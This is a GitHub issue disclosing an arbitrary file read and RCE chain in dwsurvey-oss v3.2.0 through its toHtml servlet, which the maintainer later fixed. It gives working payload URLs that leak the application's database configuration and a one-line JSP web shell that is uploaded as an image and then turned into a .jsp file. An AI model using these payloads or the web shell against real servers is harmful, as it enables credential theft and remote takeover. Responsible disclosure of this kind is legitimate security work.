Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

There are arbitrary file reading vulnerabilities and background rce vulnerabilities #80

Closed
lavon321 opened this issue Aug 16, 2021 · 2 comments

Comments

@lavon321
Copy link

lavon321 commented Aug 16, 2021

In the latest version of dwsurvey-oss-v3.2.0, there is a requestdispatcher.forward Request forwarding. Since the same request object and response object are shared before and after forwarding, the forwarded response will be output to the byte array buffer in memory, and finally the file is written in the printstream function. Because Requestdispatcher.forward is a jump between internal resources, you can request internal sensitive files on the server, such as: / WEB-INF / web.xml, causing arbitrary file vulnerabilities by writing and re accessing; In addition, it can also cause rce in combination with background file upload.

Request forwarding exists in the server method in the com/key/common/utils/ToHtmlServlet.java file
image
Due to the existence of ByteArrayOutputStream, the forwarded response is saved in the byte array buffer in memory
The flushDo function was passed in
image
Here, it is converted into a string and assigned to the document variable
image
Pass in printStream function
image
Splice savepath and filename as the target file, and finally write the response content to the file. The savepath and filename variables can also be controlled from the above
image

payload:
http://localhost:8888/diaowen/toHtml?filePath=/&fileName=1.txt&url=/WEB-INF/classes/conf/application.properties
The 1.txt file will be written in the web root directory and then accessed http://localhost:8888/diaowen/1.txt
Successfully read database configuration file:
image

You can also find a file upload place in the background to create rce, create a new questionnaire - > Advanced Editor in the background, and upload a picture horse and burpsuite to capture the package
image
image

Visit http://localhost:8888/diaowen/toHtml?filePath=/&fileName=1.jsp&url=/ueditor/jsp/upload/image/20210815/1629018633885086990.png ,the JSP file will be generated in the web root directory
Due to the Jsoup. parse method resolution to escape of JSP tags, when tested, when using the '<script> </script>' tag to package payload, can successfully bypass escaped
image
So the uploaded image file content is:
<script><%Runtime.getRuntime().exec(request.getParameter("i"));%></script>
Visit http://localhost:8888/diaowen/1.jsp?i=calc, successfully rce:
image

@wkeyuan
Copy link
Owner

wkeyuan commented Jan 20, 2022

版本已经更新,请检查是否还存在

@wkeyuan wkeyuan closed this as completed Jan 20, 2022
@lavon321
Copy link
Author

新版本不存在该问题

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

2 participants